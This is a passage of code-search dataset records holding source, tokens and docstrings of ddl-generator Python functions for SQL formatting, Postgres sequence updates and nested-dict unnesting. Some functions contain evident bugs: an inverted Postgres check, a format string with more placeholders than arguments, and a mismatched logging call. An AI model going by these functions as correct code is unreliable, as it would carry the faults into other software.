"(",
"\"'\"",
",",
"\"''\"",
")",
"else",
":",
"return",
"datum"
] | Puts a value in proper format for a SQL string | [
"Puts",
"a",
"value",
"in",
"proper",
"format",
"for",
"a",
"SQL",
"string"
] | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/ddlgenerator.py#L360-L385 |
catherinedevlin/ddl-generator | ddlgenerator/ddlgenerator.py | Table.emit_db_sequence_updates | def emit_db_sequence_updates(self):
"""Set database sequence objects to match the source db
Relevant only when generated from SQLAlchemy connection.
Needed to avoid subsequent unique key violations after DB build."""
if self.source.db_engine and self.source.db_engine.name != 'postgresql':
# not implemented for other RDBMS; necessity unknown
conn = self.source.db_engine.connect()
qry = """SELECT 'SELECT last_value FROM ' || n.nspname || '.' || c.relname || ';'
FROM pg_namespace n
JOIN pg_class c ON (n.oid = c.relnamespace)
WHERE c.relkind = 'S'"""
result = []
for (sequence, ) in list(conn.execute(qry)):
qry = "SELECT last_value FROM %s" % sequence
(lastval, ) = conn.execute(qry).first()
nextval = int(lastval) + 1
yield "ALTER SEQUENCE %s RESTART WITH %s;" % nextval | python | def emit_db_sequence_updates(self):
"""Set database sequence objects to match the source db
Relevant only when generated from SQLAlchemy connection.
Needed to avoid subsequent unique key violations after DB build."""
if self.source.db_engine and self.source.db_engine.name != 'postgresql':
# not implemented for other RDBMS; necessity unknown
conn = self.source.db_engine.connect()
qry = """SELECT 'SELECT last_value FROM ' || n.nspname || '.' || c.relname || ';'
FROM pg_namespace n
JOIN pg_class c ON (n.oid = c.relnamespace)
WHERE c.relkind = 'S'"""
result = []
for (sequence, ) in list(conn.execute(qry)):
qry = "SELECT last_value FROM %s" % sequence
(lastval, ) = conn.execute(qry).first()
nextval = int(lastval) + 1
yield "ALTER SEQUENCE %s RESTART WITH %s;" % nextval | [
"def",
"emit_db_sequence_updates",
"(",
"self",
")",
":",
"if",
"self",
".",
"source",
".",
"db_engine",
"and",
"self",
".",
"source",
".",
"db_engine",
".",
"name",
"!=",
"'postgresql'",
":",
"# not implemented for other RDBMS; necessity unknown",
"conn",
"=",
"self",
".",
"source",
".",
"db_engine",
".",
"connect",
"(",
")",
"qry",
"=",
"\"\"\"SELECT 'SELECT last_value FROM ' || n.nspname || '.' || c.relname || ';'\n FROM pg_namespace n\n JOIN pg_class c ON (n.oid = c.relnamespace)\n WHERE c.relkind = 'S'\"\"\"",
"result",
"=",
"[",
"]",
"for",
"(",
"sequence",
",",
")",
"in",
"list",
"(",
"conn",
".",
"execute",
"(",
"qry",
")",
")",
":",
"qry",
"=",
"\"SELECT last_value FROM %s\"",
"%",
"sequence",
"(",
"lastval",
",",
")",
"=",
"conn",
".",
"execute",
"(",
"qry",
")",
".",
"first",
"(",
")",
"nextval",
"=",
"int",
"(",
"lastval",
")",
"+",
"1",
"yield",
"\"ALTER SEQUENCE %s RESTART WITH %s;\"",
"%",
"nextval"
] | Set database sequence objects to match the source db
Relevant only when generated from SQLAlchemy connection.
Needed to avoid subsequent unique key violations after DB build. | [
"Set",
"database",
"sequence",
"objects",
"to",
"match",
"the",
"source",
"db"
] | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/ddlgenerator.py#L389-L407 |
catherinedevlin/ddl-generator | ddlgenerator/ddlgenerator.py | Table.sql | def sql(self, dialect=None, inserts=False, creates=True,
drops=True, metadata_source=None):
"""
Combined results of ``.ddl(dialect)`` and, if ``inserts==True``,
``.inserts(dialect)``.
"""
result = [self.ddl(dialect, creates=creates, drops=drops)]
if inserts:
for row in self.inserts(dialect):
result.append(row)
return '\n'.join(result) | python | def sql(self, dialect=None, inserts=False, creates=True,
drops=True, metadata_source=None):
"""
Combined results of ``.ddl(dialect)`` and, if ``inserts==True``,
``.inserts(dialect)``.
"""
result = [self.ddl(dialect, creates=creates, drops=drops)]
if inserts:
for row in self.inserts(dialect):
result.append(row)
return '\n'.join(result) | [
"def",
"sql",
"(",
"self",
",",
"dialect",
"=",
"None",
",",
"inserts",
"=",
"False",
",",
"creates",
"=",
"True",
",",
"drops",
"=",
"True",
",",
"metadata_source",
"=",
"None",
")",
":",
"result",
"=",
"[",
"self",
".",
"ddl",
"(",
"dialect",
",",
"creates",
"=",
"creates",
",",
"drops",
"=",
"drops",
")",
"]",
"if",
"inserts",
":",
"for",
"row",
"in",
"self",
".",
"inserts",
"(",
"dialect",
")",
":",
"result",
".",
"append",
"(",
"row",
")",
"return",
"'\\n'",
".",
"join",
"(",
"result",
")"
] | Combined results of ``.ddl(dialect)`` and, if ``inserts==True``,
``.inserts(dialect)``. | [
"Combined",
"results",
"of",
".",
"ddl",
"(",
"dialect",
")",
"and",
"if",
"inserts",
"==",
"True",
".",
"inserts",
"(",
"dialect",
")",
"."
] | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/ddlgenerator.py#L436-L446 |
catherinedevlin/ddl-generator | ddlgenerator/reshape.py | clean_key_name | def clean_key_name(key):
"""
Makes ``key`` a valid and appropriate SQL column name:
1. Replaces illegal characters in column names with ``_``
2. Prevents name from beginning with a digit (prepends ``_``)
3. Lowercases name. If you want case-sensitive table
or column names, you are a bad person and you should feel bad.
"""
result = _illegal_in_column_name.sub("_", key.strip())
if result[0].isdigit():
result = '_%s' % result
if result.upper() in sql_reserved_words:
result = '_%s' % key
return result.lower() | python | def clean_key_name(key):
"""
Makes ``key`` a valid and appropriate SQL column name:
1. Replaces illegal characters in column names with ``_``
2. Prevents name from beginning with a digit (prepends ``_``)
3. Lowercases name. If you want case-sensitive table
or column names, you are a bad person and you should feel bad.
"""
result = _illegal_in_column_name.sub("_", key.strip())
if result[0].isdigit():
result = '_%s' % result
if result.upper() in sql_reserved_words:
result = '_%s' % key
return result.lower() | [
"def",
"clean_key_name",
"(",
"key",
")",
":",
"result",
"=",
"_illegal_in_column_name",
".",
"sub",
"(",
"\"_\"",
",",
"key",
".",
"strip",
"(",
")",
")",
"if",
"result",
"[",
"0",
"]",
".",
"isdigit",
"(",
")",
":",
"result",
"=",
"'_%s'",
"%",
"result",
"if",
"result",
".",
"upper",
"(",
")",
"in",
"sql_reserved_words",
":",
"result",
"=",
"'_%s'",
"%",
"key",
"return",
"result",
".",
"lower",
"(",
")"
] | Makes ``key`` a valid and appropriate SQL column name:
1. Replaces illegal characters in column names with ``_``
2. Prevents name from beginning with a digit (prepends ``_``)
3. Lowercases name. If you want case-sensitive table
or column names, you are a bad person and you should feel bad. | [
"Makes",
"key",
"a",
"valid",
"and",
"appropriate",
"SQL",
"column",
"name",
":"
] | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/reshape.py#L18-L34 |
catherinedevlin/ddl-generator | ddlgenerator/reshape.py | walk_and_clean | def walk_and_clean(data):
"""
Recursively walks list of dicts (which may themselves embed lists and dicts),
transforming namedtuples to OrderedDicts and
using ``clean_key_name(k)`` to make keys into SQL-safe column names
>>> data = [{'a': 1}, [{'B': 2}, {'B': 3}], {'F': {'G': 4}}]
>>> pprint(walk_and_clean(data))
[OrderedDict([('a', 1)]),
[OrderedDict([('b', 2)]), OrderedDict([('b', 3)])],
OrderedDict([('f', OrderedDict([('g', 4)]))])]
"""
# transform namedtuples to OrderedDicts
if hasattr(data, '_fields'):
data = OrderedDict((k,v) for (k,v) in zip(data._fields, data))
# Recursively clean up child dicts and lists
if hasattr(data, 'items') and hasattr(data, '__setitem__'):
for (key, val) in data.items():
data[key] = walk_and_clean(val)
elif isinstance(data, list) or isinstance(data, tuple) \
or hasattr(data, '__next__') or hasattr(data, 'next'):
data = [walk_and_clean(d) for d in data]
# Clean up any keys in this dict itself
if hasattr(data, 'items'):
original_keys = data.keys()
tup = ((clean_key_name(k), v) for (k, v) in data.items())
data = OrderedDict(tup)
if len(data) < len(original_keys):
raise KeyError('Cleaning up %s created duplicates' %
original_keys)
return data | python | def walk_and_clean(data):
"""
Recursively walks list of dicts (which may themselves embed lists and dicts),
transforming namedtuples to OrderedDicts and
using ``clean_key_name(k)`` to make keys into SQL-safe column names
>>> data = [{'a': 1}, [{'B': 2}, {'B': 3}], {'F': {'G': 4}}]
>>> pprint(walk_and_clean(data))
[OrderedDict([('a', 1)]),
[OrderedDict([('b', 2)]), OrderedDict([('b', 3)])],
OrderedDict([('f', OrderedDict([('g', 4)]))])]
"""
# transform namedtuples to OrderedDicts
if hasattr(data, '_fields'):
data = OrderedDict((k,v) for (k,v) in zip(data._fields, data))
# Recursively clean up child dicts and lists
if hasattr(data, 'items') and hasattr(data, '__setitem__'):
for (key, val) in data.items():
data[key] = walk_and_clean(val)
elif isinstance(data, list) or isinstance(data, tuple) \
or hasattr(data, '__next__') or hasattr(data, 'next'):
data = [walk_and_clean(d) for d in data]
# Clean up any keys in this dict itself
if hasattr(data, 'items'):
original_keys = data.keys()
tup = ((clean_key_name(k), v) for (k, v) in data.items())
data = OrderedDict(tup)
if len(data) < len(original_keys):
raise KeyError('Cleaning up %s created duplicates' %
original_keys)
return data | [
"def",
"walk_and_clean",
"(",
"data",
")",
":",
"# transform namedtuples to OrderedDicts",
"if",
"hasattr",
"(",
"data",
",",
"'_fields'",
")",
":",
"data",
"=",
"OrderedDict",
"(",
"(",
"k",
",",
"v",
")",
"for",
"(",
"k",
",",
"v",
")",
"in",
"zip",
"(",
"data",
".",
"_fields",
",",
"data",
")",
")",
"# Recursively clean up child dicts and lists",
"if",
"hasattr",
"(",
"data",
",",
"'items'",
")",
"and",
"hasattr",
"(",
"data",
",",
"'__setitem__'",
")",
":",
"for",
"(",
"key",
",",
"val",
")",
"in",
"data",
".",
"items",
"(",
")",
":",
"data",
"[",
"key",
"]",
"=",
"walk_and_clean",
"(",
"val",
")",
"elif",
"isinstance",
"(",
"data",
",",
"list",
")",
"or",
"isinstance",
"(",
"data",
",",
"tuple",
")",
"or",
"hasattr",
"(",
"data",
",",
"'__next__'",
")",
"or",
"hasattr",
"(",
"data",
",",
"'next'",
")",
":",
"data",
"=",
"[",
"walk_and_clean",
"(",
"d",
")",
"for",
"d",
"in",
"data",
"]",
"# Clean up any keys in this dict itself",
"if",
"hasattr",
"(",
"data",
",",
"'items'",
")",
":",
"original_keys",
"=",
"data",
".",
"keys",
"(",
")",
"tup",
"=",
"(",
"(",
"clean_key_name",
"(",
"k",
")",
",",
"v",
")",
"for",
"(",
"k",
",",
"v",
")",
"in",
"data",
".",
"items",
"(",
")",
")",
"data",
"=",
"OrderedDict",
"(",
"tup",
")",
"if",
"len",
"(",
"data",
")",
"<",
"len",
"(",
"original_keys",
")",
":",
"raise",
"KeyError",
"(",
"'Cleaning up %s created duplicates'",
"%",
"original_keys",
")",
"return",
"data"
] | Recursively walks list of dicts (which may themselves embed lists and dicts),
transforming namedtuples to OrderedDicts and
using ``clean_key_name(k)`` to make keys into SQL-safe column names
>>> data = [{'a': 1}, [{'B': 2}, {'B': 3}], {'F': {'G': 4}}]
>>> pprint(walk_and_clean(data))
[OrderedDict([('a', 1)]),
[OrderedDict([('b', 2)]), OrderedDict([('b', 3)])],
OrderedDict([('f', OrderedDict([('g', 4)]))])] | [
"Recursively",
"walks",
"list",
"of",
"dicts",
"(",
"which",
"may",
"themselves",
"embed",
"lists",
"and",
"dicts",
")",
"transforming",
"namedtuples",
"to",
"OrderedDicts",
"and",
"using",
"clean_key_name",
"(",
"k",
")",
"to",
"make",
"keys",
"into",
"SQL",
"-",
"safe",
"column",
"names"
] | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/reshape.py#L36-L67 |
catherinedevlin/ddl-generator | ddlgenerator/reshape.py | _id_fieldname | def _id_fieldname(fieldnames, table_name = ''):
"""
Finds the field name from a dict likeliest to be its unique ID
>>> _id_fieldname({'bar': True, 'id': 1}, 'foo')
'id'
>>> _id_fieldname({'bar': True, 'foo_id': 1, 'goo_id': 2}, 'foo')
'foo_id'
>>> _id_fieldname({'bar': True, 'baz': 1, 'baz_id': 3}, 'foo')
"""
templates = ['%s_%%s' % table_name, '%s', '_%s']
for stub in ['id', 'num', 'no', 'number']:
for t in templates:
if t % stub in fieldnames:
return t % stub | python | def _id_fieldname(fieldnames, table_name = ''):
"""
Finds the field name from a dict likeliest to be its unique ID
>>> _id_fieldname({'bar': True, 'id': 1}, 'foo')
'id'
>>> _id_fieldname({'bar': True, 'foo_id': 1, 'goo_id': 2}, 'foo')
'foo_id'
>>> _id_fieldname({'bar': True, 'baz': 1, 'baz_id': 3}, 'foo')
"""
templates = ['%s_%%s' % table_name, '%s', '_%s']
for stub in ['id', 'num', 'no', 'number']:
for t in templates:
if t % stub in fieldnames:
return t % stub | [
"def",
"_id_fieldname",
"(",
"fieldnames",
",",
"table_name",
"=",
"''",
")",
":",
"templates",
"=",
"[",
"'%s_%%s'",
"%",
"table_name",
",",
"'%s'",
",",
"'_%s'",
"]",
"for",
"stub",
"in",
"[",
"'id'",
",",
"'num'",
",",
"'no'",
",",
"'number'",
"]",
":",
"for",
"t",
"in",
"templates",
":",
"if",
"t",
"%",
"stub",
"in",
"fieldnames",
":",
"return",
"t",
"%",
"stub"
] | Finds the field name from a dict likeliest to be its unique ID
>>> _id_fieldname({'bar': True, 'id': 1}, 'foo')
'id'
>>> _id_fieldname({'bar': True, 'foo_id': 1, 'goo_id': 2}, 'foo')
'foo_id'
>>> _id_fieldname({'bar': True, 'baz': 1, 'baz_id': 3}, 'foo') | [
"Finds",
"the",
"field",
"name",
"from",
"a",
"dict",
"likeliest",
"to",
"be",
"its",
"unique",
"ID"
] | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/reshape.py#L69-L83 |
catherinedevlin/ddl-generator | ddlgenerator/reshape.py | unnest_child_dict | def unnest_child_dict(parent, key, parent_name=''):
"""
If ``parent`` dictionary has a ``key`` whose ``val`` is a dict,
unnest ``val``'s fields into ``parent`` and remove ``key``.
>>> parent = {'province': 'Québec', 'capital': {'name': 'Québec City', 'pop': 491140}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital_name': 'Québec City', 'capital_pop': 491140, 'province': 'Québec'}
>>> parent = {'province': 'Québec', 'capital': {'id': 1, 'name': 'Québec City', 'pop': 491140}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital_id': 1,
'capital_name': 'Québec City',
'capital_pop': 491140,
'province': 'Québec'}
>>> parent = {'province': 'Québec', 'capital': {'id': 1, 'name': 'Québec City'}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital': 'Québec City', 'province': 'Québec'}
"""
val = parent[key]
name = "%s['%s']" % (parent_name, key)
logging.debug("Unnesting dict %s" % name)
id = _id_fieldname(val, parent_name)
if id:
logging.debug("%s is %s's ID" % (id, key))
if len(val) <= 2:
logging.debug('Removing ID column %s.%s' % (key, id))
val.pop(id)
if len(val) == 0:
logging.debug('%s is empty, removing from %s' % (name, parent_name))
parent.pop(key)
return
elif len(val) == 1:
logging.debug('Nested one-item dict in %s, making scalar.' % name)
parent[key] = list(val.values())[0]
return
else:
logging.debug('Pushing all fields from %s up to %s' % (name, parent_name))
new_field_names = ['%s_%s' % (key, child_key.strip('_')) for child_key in val]
overlap = (set(new_field_names) & set(parent)) - set(id or [])
if overlap:
logging.error("Could not unnest child %s; %s present in %s"
% (name, key, ','.join(overlap), parent_name))
return
for (child_key, child_val) in val.items():
new_field_name = '%s_%s' % (key, child_key.strip('_'))
parent[new_field_name] = child_val
parent.pop(key) | python | def unnest_child_dict(parent, key, parent_name=''):
"""
If ``parent`` dictionary has a ``key`` whose ``val`` is a dict,
unnest ``val``'s fields into ``parent`` and remove ``key``.
>>> parent = {'province': 'Québec', 'capital': {'name': 'Québec City', 'pop': 491140}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital_name': 'Québec City', 'capital_pop': 491140, 'province': 'Québec'}
>>> parent = {'province': 'Québec', 'capital': {'id': 1, 'name': 'Québec City', 'pop': 491140}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital_id': 1,
'capital_name': 'Québec City',
'capital_pop': 491140,
'province': 'Québec'}
>>> parent = {'province': 'Québec', 'capital': {'id': 1, 'name': 'Québec City'}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital': 'Québec City', 'province': 'Québec'}
"""
val = parent[key]
name = "%s['%s']" % (parent_name, key)
logging.debug("Unnesting dict %s" % name)
id = _id_fieldname(val, parent_name)
if id:
logging.debug("%s is %s's ID" % (id, key))
if len(val) <= 2:
logging.debug('Removing ID column %s.%s' % (key, id))
val.pop(id)
if len(val) == 0:
logging.debug('%s is empty, removing from %s' % (name, parent_name))
parent.pop(key)
return
elif len(val) == 1:
logging.debug('Nested one-item dict in %s, making scalar.' % name)
parent[key] = list(val.values())[0]
return
else:
logging.debug('Pushing all fields from %s up to %s' % (name, parent_name))
new_field_names = ['%s_%s' % (key, child_key.strip('_')) for child_key in val]
overlap = (set(new_field_names) & set(parent)) - set(id or [])
if overlap:
logging.error("Could not unnest child %s; %s present in %s"
% (name, key, ','.join(overlap), parent_name))
return
for (child_key, child_val) in val.items():
new_field_name = '%s_%s' % (key, child_key.strip('_'))
parent[new_field_name] = child_val
parent.pop(key) | [
"def",
"unnest_child_dict",
"(",
"parent",
",",
"key",
",",
"parent_name",
"=",
"''",
")",
":",
"val",
"=",
"parent",
"[",
"key",
"]",
"name",
"=",
"\"%s['%s']\"",
"%",
"(",
"parent_name",
",",
"key",
")",
"logging",
".",
"debug",
"(",
"\"Unnesting dict %s\"",
"%",
"name",
")",
"id",
"=",
"_id_fieldname",
"(",
"val",
",",
"parent_name",
")",
"if",
"id",
":",
"logging",
".",
"debug",
"(",
"\"%s is %s's ID\"",
"%",
"(",
"id",
",",
"key",
")",
")",
"if",
"len",
"(",
"val",
")",
"<=",
"2",
":",
"logging",
".",
"debug",
"(",
"'Removing ID column %s.%s'",
"%",
"(",
"key",
",",
"id",
")",
")",
"val",
".",
"pop",
"(",
"id",
")",
"if",
"len",
"(",
"val",
")",
"==",
"0",
":",
"logging",
".",
"debug",
"(",
"'%s is empty, removing from %s'",
"%",
"(",
"name",
",",
"parent_name",
")",
")",
"parent",
".",
"pop",
"(",
"key",
")",
"return",
"elif",
"len",
"(",
"val",
")",
"==",
"1",
":",
"logging",
".",
"debug",
"(",
"'Nested one-item dict in %s, making scalar.'",
"%",
"name",
")",
"parent",
"[",
"key",
"]",
"=",
"list",
"(",
"val",
".",
"values",
"(",
")",
")",
"[",
"0",
"]",
"return",
"else",
":",
"logging",
".",
"debug",
"(",
"'Pushing all fields from %s up to %s'",
"%",
"(",
"name",
",",
"parent_name",
")",
")",
"new_field_names",
"=",
"[",
"'%s_%s'",
"%",
"(",
"key",
",",
"child_key",
".",
"strip",
"(",
"'_'",
")",
")",
"for",
"child_key",
"in",
"val",
"]",
"overlap",
"=",
"(",
"set",
"(",
"new_field_names",
")",
"&",
"set",
"(",
"parent",
")",
")",
"-",
"set",
"(",
"id",
"or",
"[",
"]",
")",
"if",
"overlap",
":",
"logging",
".",
"error",
"(",
"\"Could not unnest child %s; %s present in %s\"",
"%",
"(",
"name",
",",
"key",
",",
"','",
".",
"join",
"(",
"overlap",
")",
",",
"parent_name",
")",
")",
"return",
"for",
"(",
"child_key",
",",
"child_val",
")",
"in",
"val",
".",
"items",
"(",
")",
":",
"new_field_name",
"=",
"'%s_%s'",
"%",
"(",
"key",
",",
"child_key",
".",
"strip",
"(",
"'_'",
")",
")",
"parent",
"[",
"new_field_name",
"]",
"=",
"child_val",
"parent",
".",
"pop",
"(",
"key",
")"
] | If ``parent`` dictionary has a ``key`` whose ``val`` is a dict,
unnest ``val``'s fields into ``parent`` and remove ``key``.
>>> parent = {'province': 'Québec', 'capital': {'name': 'Québec City', 'pop': 491140}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital_name': 'Québec City', 'capital_pop': 491140, 'province': 'Québec'}
>>> parent = {'province': 'Québec', 'capital': {'id': 1, 'name': 'Québec City', 'pop': 491140}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital_id': 1,
'capital_name': 'Québec City',
'capital_pop': 491140,
'province': 'Québec'}
>>> parent = {'province': 'Québec', 'capital': {'id': 1, 'name': 'Québec City'}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital': 'Québec City', 'province': 'Québec'} | [
"If",
"parent",
"dictionary",
"has",
"a",
"key",
"whose",
"val",
"is",
"a",
"dict",
"unnest",
"val",
"s",
"fields",
"into",
"parent",
"and",
"remove",
"key",
"."
] | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/reshape.py#L113-L165 |
catherinedevlin/ddl-generator | ddlgenerator/reshape.py | unnest_children | def unnest_children(data, parent_name='', pk_name=None, force_pk=False):
"""
For each ``key`` in each row of ``data`` (which must be a list of dicts),
unnest any dict values into ``parent``, and remove list values into separate lists.
Return (``data``, ``pk_name``, ``children``, ``child_fk_names``) where
``data``
the transformed input list
``pk_name``
field name of ``data``'s (possibly new) primary key
``children``
a defaultdict(list) of data extracted from child lists
``child_fk_names``
dict of the foreign key field name in each child
"""
possible_fk_names = ['%s_id' % parent_name, '_%s_id' % parent_name, 'parent_id', ]
if pk_name:
possible_fk_names.insert(0, '%s_%s' % (parent_name, pk_name.strip('_')))
children = defaultdict(list)
field_names_used_by_children = defaultdict(set)
child_fk_names = {}
parent = ParentTable(data, parent_name, pk_name=pk_name, force_pk=force_pk)
for row in parent:
try:
for (key, val) in row.items():
if hasattr(val, 'items'):
unnest_child_dict(parent=row, key=key, parent_name=parent_name)
elif isinstance(val, list) or isinstance(val, tuple):
# force listed items to be dicts, not scalars
row[key] = [v if hasattr(v, 'items') else {key: v} for v in val]
except AttributeError:
raise TypeError('Each row should be a dictionary, got %s: %s' % (type(row), row))
for (key, val) in row.items():
if isinstance(val, list) or isinstance(val, tuple):
for child in val:
field_names_used_by_children[key].update(set(child.keys()))
for (child_name, names_in_use) in field_names_used_by_children.items():
if not parent.pk:
parent.assign_pk()
for fk_name in possible_fk_names:
if fk_name not in names_in_use:
break
else:
raise Exception("Cannot find unused field name in %s.%s to use as foreign key"
% (parent_name, child_name))
child_fk_names[child_name] = fk_name
for row in parent:
if child_name in row:
for child in row[child_name]:
child[fk_name] = row[parent.pk.name]
children[child_name].append(child)
row.pop(child_name)
# TODO: What if rows have a mix of scalar / list / dict types?
return (parent, parent.pk.name if parent.pk else None, children, child_fk_names) | python | def unnest_children(data, parent_name='', pk_name=None, force_pk=False):
"""
For each ``key`` in each row of ``data`` (which must be a list of dicts),
unnest any dict values into ``parent``, and remove list values into separate lists.
Return (``data``, ``pk_name``, ``children``, ``child_fk_names``) where
``data``
the transformed input list
``pk_name``
field name of ``data``'s (possibly new) primary key
``children``
a defaultdict(list) of data extracted from child lists
``child_fk_names``
dict of the foreign key field name in each child
"""
possible_fk_names = ['%s_id' % parent_name, '_%s_id' % parent_name, 'parent_id', ]
if pk_name:
possible_fk_names.insert(0, '%s_%s' % (parent_name, pk_name.strip('_')))
children = defaultdict(list)
field_names_used_by_children = defaultdict(set)
child_fk_names = {}
parent = ParentTable(data, parent_name, pk_name=pk_name, force_pk=force_pk)
for row in parent:
try:
for (key, val) in row.items():
if hasattr(val, 'items'):
unnest_child_dict(parent=row, key=key, parent_name=parent_name)
elif isinstance(val, list) or isinstance(val, tuple):
# force listed items to be dicts, not scalars
row[key] = [v if hasattr(v, 'items') else {key: v} for v in val]
except AttributeError:
raise TypeError('Each row should be a dictionary, got %s: %s' % (type(row), row))
for (key, val) in row.items():
if isinstance(val, list) or isinstance(val, tuple):
for child in val:
field_names_used_by_children[key].update(set(child.keys()))
for (child_name, names_in_use) in field_names_used_by_children.items():
if not parent.pk:
parent.assign_pk()
for fk_name in possible_fk_names:
if fk_name not in names_in_use:
break
else:
raise Exception("Cannot find unused field name in %s.%s to use as foreign key"
% (parent_name, child_name))
child_fk_names[child_name] = fk_name
for row in parent:
if child_name in row:
for child in row[child_name]:
child[fk_name] = row[parent.pk.name]
children[child_name].append(child)
row.pop(child_name)
# TODO: What if rows have a mix of scalar / list / dict types?
return (parent, parent.pk.name if parent.pk else None, children, child_fk_names) | [
"def",
"unnest_children",
"(",
"data",
",",
"parent_name",
"=",
"''",
",",
"pk_name",
"=",
"None",
",",
"force_pk",
"=",
"False",
")",
":",
"possible_fk_names",
"=",
"[",
"'%s_id'",
"%",
"parent_name",
",",
"'_%s_id'",
"%",
"parent_name",
",",
"'parent_id'",
",",
"]",
"if",
"pk_name",
":",
"possible_fk_names",
".",
"insert",
"(",
"0",
",",
"'%s_%s'",
"%",
"(",
"parent_name",
",",
"pk_name",
".",
"strip",
"(",
"'_'",
")",
")",
")",
"children",
"=",
"defaultdict",
"(",
"list",
")",
"field_names_used_by_children",
"=",
"defaultdict",
"(",
"set",
")",
"child_fk_names",
"=",
"{",
"}",
"parent",
"=",
"ParentTable",
"(",
"data",
",",
"parent_name",
",",
"pk_name",
"=",
"pk_name",
",",
"force_pk",
"=",
"force_pk",
")",
"for",
"row",
"in",
"parent",
":",
"try",
":",
"for",
"(",
"key",
",",
"val",
")",
"in",
"row",
".",
"items",
"(",
")",
":",
"if",
"hasattr",
"(",
"val",
",",
"'items'",
")",
":",
"unnest_child_dict",
"(",
"parent",
"=",
"row",
",",
"key",
"=",
"key",
",",
"parent_name",
"=",
"parent_name",
")",
"elif",
"isinstance",
"(",
"val",
",",
"list",
")",
"or",
"isinstance",
"(",
"val",
",",
"tuple",
")",
":",
"# force listed items to be dicts, not scalars",
"row",
"[",
"key",
"]",
"=",
"[",
"v",
"if",
"hasattr",
"(",
"v",
",",
"'items'",
")",
"else",
"{",
"key",
":",
"v",
"}",
"for",
"v",
"in",
"val",
"]",
"except",
"AttributeError",
":",
"raise",
"TypeError",
"(",
"'Each row should be a dictionary, got %s: %s'",
"%",
"(",
"type",
"(",
"row",
")",
",",
"row",
")",
")",
"for",
"(",
"key",
",",
"val",
")",
"in",
"row",
".",
"items",
"(",
")",
":",
"if",
"isinstance",
"(",
"val",
",",
"list",
")",
"or",
"isinstance",
"(",
"val",
",",
"tuple",
")",
":",
"for",
"child",
"in",
"val",
":",
"field_names_used_by_children",
"[",
"key",
"]",
".",
"update",
"(",
"set",
"(",
"child",
".",
"keys",
"(",
")",
")",
")",
"for",
"(",
"child_name",
",",
"names_in_use",
")",
"in",
"field_names_used_by_children",
".",
"items",
"(",
")",
":",
"if",
"not",
"parent",
".",
"pk",
":",
"parent",
".",
"assign_pk",
"(",
")",
"for",
"fk_name",
"in",
"possible_fk_names",
":",
"if",
"fk_name",
"not",
"in",
"names_in_use",
":",
"break",
"else",
":",
"raise",
"Exception",
"(",
"\"Cannot find unused field name in %s.%s to use as foreign key\"",
"%",
"(",
"parent_name",
",",
"child_name",
")",
")",
"child_fk_names",
"[",
"child_name",
"]",
"=",
"fk_name",
"for",
"row",
"in",
"parent",
":",
"if",
"child_name",
"in",
"row",
":",
"for",
"child",
"in",
"row",
"[",
"child_name",
"]",
":",
"child",
"[",
"fk_name",
"]",
"=",
"row",
"[",
"parent",
".",
"pk",
".",
"name",
"]",
"children",
"[",
"child_name",
"]",
".",
"append",
"(",
"child",
")",
"row",
".",
"pop",
"(",
"child_name",
")",
"# TODO: What if rows have a mix of scalar / list / dict types?",
"return",
"(",
"parent",
",",
"parent",
".",
"pk",
".",
"name",
"if",
"parent",
".",
"pk",
"else",
"None",
",",
"children",
",",
"child_fk_names",
")"
] | For each ``key`` in each row of ``data`` (which must be a list of dicts),
unnest any dict values into ``parent``, and remove list values into separate lists.
Return (``data``, ``pk_name``, ``children``, ``child_fk_names``) where
``data``
the transformed input list
``pk_name``
field name of ``data``'s (possibly new) primary key
``children``
a defaultdict(list) of data extracted from child lists
``child_fk_names``
dict of the foreign key field name in each child | [
"For",
"each",
"key",
"in",
"each",
"row",
"of",
"data",
"(",
"which",
"must",
"be",
"a",
"list",
"of",
"dicts",
")",
"unnest",
"any",
"dict",
"values",
"into",
"parent",
"and",
"remove",
"list",
"values",
"into",
"separate",
"lists",
"."
] | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/reshape.py#L263-L318 |
catherinedevlin/ddl-generator | ddlgenerator/reshape.py | ParentTable.suitability_as_key | def suitability_as_key(self, key_name):
"""
Returns: (result, key_type)
``result`` is True, False, or 'absent' or 'partial' (both still usable)
``key_type`` is ``int`` for integer keys or ``str`` for hash keys
"""
pk_values = all_values_for(self, key_name)
if not pk_values:
return ('absent', int) # could still use it
key_type = type(th.best_coercable(pk_values))
num_unique_values = len(set(pk_values))
if num_unique_values < len(pk_values):
return (False, None) # non-unique
if num_unique_values == len(self):
return (True, key_type) # perfect!
return ('partial', key_type) | python | def suitability_as_key(self, key_name):
"""
Returns: (result, key_type)
``result`` is True, False, or 'absent' or 'partial' (both still usable)
``key_type`` is ``int`` for integer keys or ``str`` for hash keys
"""
pk_values = all_values_for(self, key_name)
if not pk_values:
return ('absent', int) # could still use it
key_type = type(th.best_coercable(pk_values))
num_unique_values = len(set(pk_values))
if num_unique_values < len(pk_values):
return (False, None) # non-unique
if num_unique_values == len(self):
return (True, key_type) # perfect!
return ('partial', key_type) | [
"def",
"suitability_as_key",
"(",
"self",
",",
